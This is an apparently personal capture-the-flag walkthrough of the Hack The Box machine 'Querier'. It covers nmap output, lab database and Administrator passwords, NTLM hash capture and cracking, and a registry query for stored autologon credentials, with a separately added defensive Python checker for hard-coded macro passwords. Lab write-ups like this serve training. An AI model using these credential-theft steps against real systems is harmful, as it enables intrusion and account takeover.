Hackthebox - Querier

Querier

10.10.10.125

nmap

# Nmap 7.92 scan initiated Mon May  8 14:25:59 2023 as: nmap -e tun0 -sC -sV -oA nmap/default -v 10.10.10.125
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.10.125
Host is up (0.89s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
|_ssl-date: 2023-05-08T06:27:27+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-08T06:22:51
| Not valid after: 2053-05-08T06:22:51
| MD5: fdf1 4172 6b74 814d beb3 94e4 53b3 9df3
|_SHA-1: 1673 5504 5349 0d0c 5a3c 9aac 81e7 c36b f4fc 8516
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2023-05-08T06:27:14
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 8 14:27:26 2023 -- 1 IP address (1 host up) scanned in 86.80 seconds

SMB file download

Downloaded the file via smbclient -L 10.10.10.125:
Currency Volume Report.xlsm: Microsoft Excel 2007+

Excel file contents

vbaProject.bin file contents

database=volume
uid=reporting
pwd=PcwTWTHRwryjc$c6
Possibly the MSSQL password?

While analysing this file I found a useful tool: oletools.
Its olevba handles Excel files very conveniently, extracting the VB code from them, and readability improves immediately.

Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
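Added example (not from the original writeup or from oletools): a small Python checker a defender could run over olevba output to flag macros carrying a hard-coded database password. It parses ODBC-style connection strings, including brace-quoted values such as {SQL Server}; the VBA fragment around the recovered string is constructed.

```python
import re

# Keys whose values are secrets in ODBC/ADO connection strings (lower-cased).
SECRET_KEYS = {"pwd", "password"}
USER_KEYS = {"uid", "user id", "user"}

# Run of two or more key=value pairs; a brace-quoted value ({SQL Server}) may contain ';'.
CONN_STR_RE = re.compile(r'(?:[A-Za-z_ ]+=(?:\{[^}]*\}|[^;"\n]*);?){2,}')


def parse_connection_string(s):
    """Split an ODBC-style connection string into {key: value}; keys lower-cased."""
    pairs, pos, n = {}, 0, len(s)
    while pos < n:
        while pos < n and s[pos] in "; \t":   # skip separators
            pos += 1
        if pos >= n:
            break
        eq = s.find("=", pos)
        if eq < 0:
            raise ValueError("connection string fragment without '='")
        key, pos = s[pos:eq].strip().lower(), eq + 1
        if pos < n and s[pos] == "{":          # brace-quoted value keeps inner text
            end = s.find("}", pos)
            if end < 0:
                raise ValueError("unterminated '{' in value")
            pairs[key], pos = s[pos + 1:end], end + 1
        else:
            end = s.find(";", pos) if ";" in s[pos:] else n
            pairs[key], pos = s[pos:end].strip(), end
    return pairs


def find_embedded_credentials(text):
    """One finding per connection string in `text` that carries a password."""
    findings = []
    for m in CONN_STR_RE.finditer(text):
        pairs = parse_connection_string(m.group(0))
        secret = next((k for k in pairs if k in SECRET_KEYS), None)
        if secret is None:
            continue
        user = next((pairs[k] for k in pairs if k in USER_KEYS), None)
        findings.append({"server": pairs.get("server"), "database": pairs.get("database"),
                         "user": user, "secret_key": secret})
    return findings


# Constructed sample in the shape olevba prints, around the string recovered above.
SAMPLE_VBA = '''Set conn = CreateObject("ADODB.Connection")
conn.Open "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
rs.Open "SELECT * FROM volume", conn
'''
```

Running find_embedded_credentials over the whole olevba dump of a workbook gives one line per macro that embeds a database password, which is the signal to rotate that account.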

Possible username

Luis

MSSQL database

My impacket install had been broken earlier by carelessly installing other packages, which reminded me once again that Python environments must be kept isolated.
In the end I used the docker version.

After giving mssqlclient.py the -windows-auth parameter, the connection to the database succeeded.

Stealing the hash

It worked!

Privileges

The reporting account has fairly low privileges; next, try stealing a hash.

User list

QUERIER\reporting
sa

Database names

Version

NTLM hash cracking

Made MSSQL call out over SMB and captured the hash:

[SMB] NTLMv2-SSP Client   : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:787361df2b95bda...

Threw this into hashcat.

The result is corporate568.
Credentials obtained: mssql-svc:corporate568
Threw them into crackmapexec to see.

Oh? A shell!

Reverse shell

Another day of saying no to msf (x

Got the user flag.

winPEAS

Group Policy cache

MyUnclesAreMarioAndLuigi!!1!

Huh?
Administrator:MyUnclesAreMarioAndLuigi!!1!

Interesting files

Modifiable services

https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services

autologon credentials

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

psexec

Using the Administrator credentials recovered by winPEAS, get a SYSTEM shell.
Administrator:MyUnclesAreMarioAndLuigi!!1!
